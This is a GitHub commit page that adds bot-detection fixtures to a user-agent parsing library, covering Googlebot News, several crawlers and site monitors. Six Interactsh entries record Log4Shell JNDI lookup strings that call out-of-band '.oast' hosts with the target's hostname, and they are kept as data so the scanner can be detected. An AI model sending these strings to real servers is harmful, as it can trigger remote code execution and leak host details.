forked from matomo-org/device-detector
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Adds detection for various bots (matomo-org#7612)
* Improves detection for Googlebot News * Adds detection for Interactsh * Adds detection for webtru * Adds detection for URLSuMaBot * Adds detection for 360JK * Improves detection for generic bots * Improves detection for generic bots * Adds detection for UCSB Network Measurement * Adds detection for Plesk Screenshot Service * Improves detection for Yahoo! Japan * Adds detection for Who.is Bot * Adds detection for Electron Fetch * Adds detection for WireReaderBot --------- Co-authored-by: Tutik Alexsandr <[email protected]>
- Loading branch information
1 parent
cd99c14
commit 29b5c5d
Showing
4 changed files
with
237 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -1331,7 +1331,7 @@ | |
- | ||
user_agent: Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22)) | ||
bot: | ||
name: Googlebot | ||
name: Googlebot News | ||
category: Search bot | ||
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers | ||
producer: | ||
|
@@ -4203,8 +4203,8 @@ | |
url: https://github.com/projectdiscovery/httpx | ||
category: Crawler | ||
producer: | ||
name: "" | ||
url: "" | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: 'Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: [email protected]' | ||
bot: | ||
|
@@ -7205,3 +7205,143 @@ | |
producer: | ||
name: Open Technologies Bulgaria, Ltd. | ||
url: https://kiwitcms.org | ||
- | ||
user_agent: Googlebot-News | ||
bot: | ||
name: Googlebot News | ||
category: Search bot | ||
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers | ||
producer: | ||
name: Google Inc. | ||
url: https://www.google.com/ | ||
- | ||
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}' | ||
bot: | ||
name: Interactsh | ||
category: Security Checker | ||
url: https://github.com/projectdiscovery/interactsh | ||
producer: | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro}' | ||
bot: | ||
name: Interactsh | ||
category: Security Checker | ||
url: https://github.com/projectdiscovery/interactsh | ||
producer: | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.online}' | ||
bot: | ||
name: Interactsh | ||
category: Security Checker | ||
url: https://github.com/projectdiscovery/interactsh | ||
producer: | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.site}' | ||
bot: | ||
name: Interactsh | ||
category: Security Checker | ||
url: https://github.com/projectdiscovery/interactsh | ||
producer: | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.fun}' | ||
bot: | ||
name: Interactsh | ||
category: Security Checker | ||
url: https://github.com/projectdiscovery/interactsh | ||
producer: | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.me}' | ||
bot: | ||
name: Interactsh | ||
category: Security Checker | ||
url: https://github.com/projectdiscovery/interactsh | ||
producer: | ||
name: ProjectDiscovery, Inc. | ||
url: https://projectdiscovery.io/ | ||
- | ||
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler | ||
bot: | ||
name: webtru | ||
category: Crawler | ||
url: https://webtru.io/ | ||
producer: | ||
name: DataSign Inc. | ||
url: https://datasign.jp/ | ||
- | ||
user_agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko; compatible; URLSuMaBot / 1.0; +https://www.urlsuma.de/bot.aspx) Chrome / 70.0.3538.77 Safari / 537.36 | ||
bot: | ||
name: URLSuMaBot | ||
category: Crawler | ||
url: https://www.urlsuma.de/ | ||
- | ||
user_agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) 360JK yunjiankong 427691 | ||
bot: | ||
name: 360JK | ||
category: Site Monitor | ||
url: http://jk.cloud.360.cn/ | ||
producer: | ||
name: 360 Security Technology Inc. | ||
url: https://www.360.cn/ | ||
- | ||
user_agent: LinkChain | ||
bot: | ||
name: Generic Bot | ||
- | ||
user_agent: Morfeus Fucking Scanner | ||
bot: | ||
name: Generic Bot | ||
- | ||
user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 UCSBNetworkMeasurement/2023 (contact; stijn; at; ucsb.edu;) | ||
bot: | ||
name: UCSB Network Measurement | ||
category: Crawler | ||
url: https://www.it.ucsb.edu/ | ||
producer: | ||
name: University of California, Santa Barbara | ||
url: https://www.it.ucsb.edu/ | ||
- | ||
user_agent: Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066 | ||
bot: | ||
name: Plesk Screenshot Service | ||
category: Service Agent | ||
url: https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service | ||
producer: | ||
name: Plesk International GmbH | ||
url: https://www.plesk.com/ | ||
- | ||
user_agent: Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955) | ||
bot: | ||
name: Yahoo! Japan ASR | ||
category: Crawler | ||
url: https://support.yahoo-net.jp/PccSearch/s/article/H000007955 | ||
producer: | ||
name: Yahoo! Japan Corp. | ||
url: https://www.yahoo.co.jp/ | ||
- | ||
user_agent: Who.is Bot | ||
bot: | ||
name: Who.is Bot | ||
category: Crawler | ||
url: https://who.is/ | ||
- | ||
user_agent: Mozilla/5.0 (compatible; WireReaderBot/1.0; +https://wirereader.app) | ||
bot: | ||
name: WireReaderBot | ||
category: Feed Fetcher | ||
url: https://wirereader.app/ | ||
- | ||
user_agent: WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | ||
bot: | ||
name: WireReaderBot | ||
category: Feed Fetcher | ||
url: https://wirereader.app/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters